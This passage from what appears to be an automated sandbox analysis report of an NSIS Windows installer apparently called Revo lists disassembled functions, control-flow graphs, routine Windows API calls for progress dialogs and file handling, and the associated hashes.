                                                                                                                                                                            • Opcode Fuzzy Hash: 446e4d9e8c1d4a14347065386ac826de02e691f6a80b4fecd99ec428265b0f29
                                                                                                                                                                            • Instruction Fuzzy Hash: 57511D75D04119AADF20EFD4CA85AAEBB79FF44304F14817BE501F62D0D7B89D828B58

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 807 403053-403062 808 403064-40306b 807->808 809 40307c-403082 807->809 810 403074-40307a 808->810 811 40306d-40306e DestroyWindow 808->811 812 403084-403085 call 406ad2 809->812 813 40308c-403098 GetTickCount 809->813 814 4030f2-4030f4 810->814 811->810 817 40308a 812->817 813->814 816 40309a-4030a0 813->816 818 4030a2-4030a9 816->818 819 4030cf-4030ec CreateDialogParamW ShowWindow 816->819 817->814 818->814 820 4030ab-4030cd call 403037 wsprintfW call 405727 818->820 819->814 820->814
                                                                                                                                                                            APIs
                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000), ref: 0040306E
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 0040308C
                                                                                                                                                                            • wsprintfW.USER32 ref: 004030BA
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402FB8,00000000), ref: 004030DE
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005), ref: 004030EC
                                                                                                                                                                              • Part of subcall function 00403037: MulDiv.KERNEL32(00003F10,00000064,00006606), ref: 0040304C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                            • String ID: ... %d%%
                                                                                                                                                                            • API String ID: 722711167-2449383134
                                                                                                                                                                            • Opcode ID: d603ab3d22ab90fcd5f028abd96f50b67476582cf4834f7724a7b10d819c61fb
                                                                                                                                                                            • Instruction ID: b005de13b07ab1df3b0a0d37ac4da2542258f94e3c9e0ca78ad4bdefce21122a
                                                                                                                                                                            • Opcode Fuzzy Hash: d603ab3d22ab90fcd5f028abd96f50b67476582cf4834f7724a7b10d819c61fb
                                                                                                                                                                            • Instruction Fuzzy Hash: B901CC70402220EBCB21AF51AE4AA6B7F6CFB00B46F14457BF441B11D4DAB84540DBAF

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 825 402fb8-402fc8 826 402fe3-402fea 825->826 827 402fca-402fdc SetTimer 825->827 828 403031-403034 826->828 829 402fec-402ffd call 403037 826->829 827->826 832 403004-40302c wsprintfW SetWindowTextW SetDlgItemTextW 829->832 833 402fff 829->833 832->828 833->832
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                                                                                                                            • wsprintfW.USER32 ref: 0040300A
                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040301A
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040302C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                            • API String ID: 1451636040-1158693248
                                                                                                                                                                            • Opcode ID: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                                                            • Instruction ID: f5d0dfdab9bbc179110c2e882a8d19bdfb033941f80f33e9338fd5ae6b2d935a
                                                                                                                                                                            • Opcode Fuzzy Hash: f8ef608f1f7aebad9f190b0f8632da2cbee9a529c9542a92035af67f4cb09c9f
                                                                                                                                                                            • Instruction Fuzzy Hash: BDF0317054020CABEF209F60DD4ABEE3B6CEB04349F00803AFA45B51D0DBB996598F99

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 834 402975-40298e call 402dcb call 405fe8 839 402990-402992 call 402dcb 834->839 840 402997-4029b0 call 40616d call 406192 834->840 839->840 846 402a60-402a65 840->846 847 4029b6-4029bf 840->847 850 402a67-402a73 DeleteFileW 846->850 851 402a7a 846->851 848 4029c5-4029dc GlobalAlloc 847->848 849 402a48-402a5a call 403396 CloseHandle 847->849 848->849 852 4029de-4029fb call 40361d call 403607 GlobalAlloc 848->852 849->846 850->851 859 402a31-402a44 call 406244 GlobalFree 852->859 860 4029fd-402a05 call 403396 852->860 859->849 863 402a0a 860->863 865 402a24-402a26 863->865 866 402a28-402a2b GlobalFree 865->866 867 402a0c-402a21 call 40614d 865->867 866->859 867->865
                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                                                                                                                            • GlobalFree.KERNELBASE(00000000), ref: 00402A3E
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                                                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2667972263-0
                                                                                                                                                                            • Opcode ID: c96ccbf9fda6c9b84cd62cb9b7995758edb6499716e88819902f7f7503e7d0df
                                                                                                                                                                            • Instruction ID: 2a34c59540e1e2abd0e75fc718a4647e5be88802d3978a8477eddc4b0ca47f36
                                                                                                                                                                            • Opcode Fuzzy Hash: c96ccbf9fda6c9b84cd62cb9b7995758edb6499716e88819902f7f7503e7d0df
                                                                                                                                                                            • Instruction Fuzzy Hash: 2531B171D00124BBCF21AFA5DD89D9E7E79AF45364F14023AF411762E1CB794D418F68

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 870 40349e-4034c6 GetTickCount 871 4035f6-4035f8 call 403053 870->871 872 4034cc-4034f7 call 40361d SetFilePointer 870->872 875 4035fd-4035fe 871->875 877 4034fc-40350e 872->877 878 403600-403604 875->878 879 403510 877->879 880 403512-403520 call 403607 877->880 879->880 883 403526-403532 880->883 884 4035e8-4035eb 880->884 885 403538-40353e 883->885 884->878 886 403540-403546 885->886 887 403569-403585 call 406c11 885->887 886->887 888 403548-403563 call 403053 886->888 893 4035f1 887->893 894 403587-40358f 887->894 892 403568 888->892 892->887 895 4035f3-4035f4 893->895 896 403591-403599 call 406244 894->896 897 4035b2-4035b8 894->897 895->878 900 40359e-4035a0 896->900 897->893 899 4035ba-4035bc 897->899 899->893 901 4035be-4035d1 899->901 902 4035a2-4035ae 900->902 903 4035ed-4035ef 900->903 901->877 904 4035d7-4035e6 SetFilePointer 901->904 902->885 905 4035b0 902->905 903->895 904->871 905->901
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004034B2
                                                                                                                                                                              • Part of subcall function 0040361D: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004034E5
                                                                                                                                                                            • SetFilePointer.KERNEL32(00075088,00000000,00000000,004266F0,00004000,?,00000000,004033C8,00000004,00000000,00000000,?,?,00403342,000000FF,00000000), ref: 004035E0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer$CountTick
                                                                                                                                                                            • String ID: hA$B
                                                                                                                                                                            • API String ID: 1092082344-3967375562
                                                                                                                                                                            • Opcode ID: cb276c14483c105a7586c14d68be8b5b17aecd994db7d3163225ad987586a429
                                                                                                                                                                            • Instruction ID: a6cc621958e3896f8f0562ac50284c64eb2e0996e34cc3673b0accbb5e92da07
                                                                                                                                                                            • Opcode Fuzzy Hash: cb276c14483c105a7586c14d68be8b5b17aecd994db7d3163225ad987586a429
                                                                                                                                                                            • Instruction Fuzzy Hash: C231D076504201EFDB209F6AFE419663FACF720356B85823FF901A22F0CB749901AB1D
                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                                                                                                                                            • wsprintfW.USER32 ref: 00404F78
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                            • String ID: %u.%u%s%s$H'D
                                                                                                                                                                            • API String ID: 3540041739-2781796796
                                                                                                                                                                            • Opcode ID: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
                                                                                                                                                                            • Instruction ID: afccc7aac3e313c9cd9c08cd77de86888644faadf6bfb13213ca5942e74a4345
                                                                                                                                                                            • Opcode Fuzzy Hash: 60bc0f88830695825215d5d13d670849f6c8cdac88fb7759c02a5879209dc451
                                                                                                                                                                            • Instruction Fuzzy Hash: 2311B7739041283BDB0065AD9C46E9E369CEB85374F254637FA26F71D1EA79CC2182E8
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                                                            • wsprintfW.USER32 ref: 00406A78
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                            • String ID: %s%S.dll$UXTHEME
                                                                                                                                                                            • API String ID: 2200240437-1106614640
                                                                                                                                                                            • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                                                            • Instruction ID: 2c328a31db22aac531adf2f34800fe5ee0562984a44f040f64af452ff7173633
                                                                                                                                                                            • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                                                                                                                                            • Instruction Fuzzy Hash: 36F0FC3060011967CF14BB64DD0EF9B375C9B01704F10847AA546F10D0EB789668CF98
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00401E0A
                                                                                                                                                                            • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                                                                                                                                            • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                            • Opcode ID: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
                                                                                                                                                                            • Instruction ID: 8b1e6a7b1bb1698afdfead794f6417fbb3764ba01e46f9acc2dad3d3b5bdcb0f
                                                                                                                                                                            • Opcode Fuzzy Hash: 6959fe0fb51f26aaa33814d0e10720d0f48c0e6d4b98dacb20f991dbe6298ab2
                                                                                                                                                                            • Instruction Fuzzy Hash: 26213B72D04119AFCB05DF98DE85AEEBBB5EB08300F14003AF945F62A0D7749D81DB98
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CD8
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CF0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                            • String ID: !
                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                            • Opcode ID: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
                                                                                                                                                                            • Instruction ID: 9c099894a08b5387b140c0c6ceeae01ce9e162d44e3ef65fd99a7f94bc085c8a
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
                                                                                                                                                                            • Instruction Fuzzy Hash: 00219E71D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B889418B98
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402128
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,00002000,?,0041E658,0040A000,?,00000008,00000001,000000F0), ref: 00402189
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                                              • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                                              • Part of subcall function 00405727: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,004030CD,004030CD,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                                              • Part of subcall function 00405727: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsi60BC.tmp\), ref: 00405794
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                                              • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2776547890.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2776511579.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776587140.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776621684.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2776849100.0000000000579000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_Revo.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Librarylstrlen$CallbackDispatcherFreeHandleLoadModuleTextUserWindowlstrcat
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 719239633-0
                                                                                                                                                                            • Opcode ID: 5de1fd10f3c34d91682e05c9c3a69af0ea4da51c711688d66b0c73311e70599a
                                                                                                                                                                            • Instruction ID: ce338c56279ea8fe8b79aec8352296299df23ba62fb37657eb23f857ac8d175a
                                                                                                                                                                            • Opcode Fuzzy Hash: 5de1fd10f3c34d91682e05c9c3a69af0ea4da51c711688d66b0c73311e70599a
                                                                                                                                                                            • Instruction Fuzzy Hash: 9721D431900104EADF10AFA5CF89A9E7A71BF54355F30413BF501B91E5CBBD89829A2E
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004066A2: lstrcpynW.KERNEL32(?,?,00002000,004037D7,00464260,NSIS Error,?,00000008,0000000A,0000000C), ref: 004066AF
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 0040602A
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                                              • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                                                            • lstrlenW.KERNEL32(00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0,004BD000), ref: 004060D2
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00456750,00456750,00456750,00456750,00456750,00456750,00000000,00456750,00456750,74DF3420,?,74DF2EE0,00405DCE,?,74DF3420,74DF2EE0), ref: 004060E2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
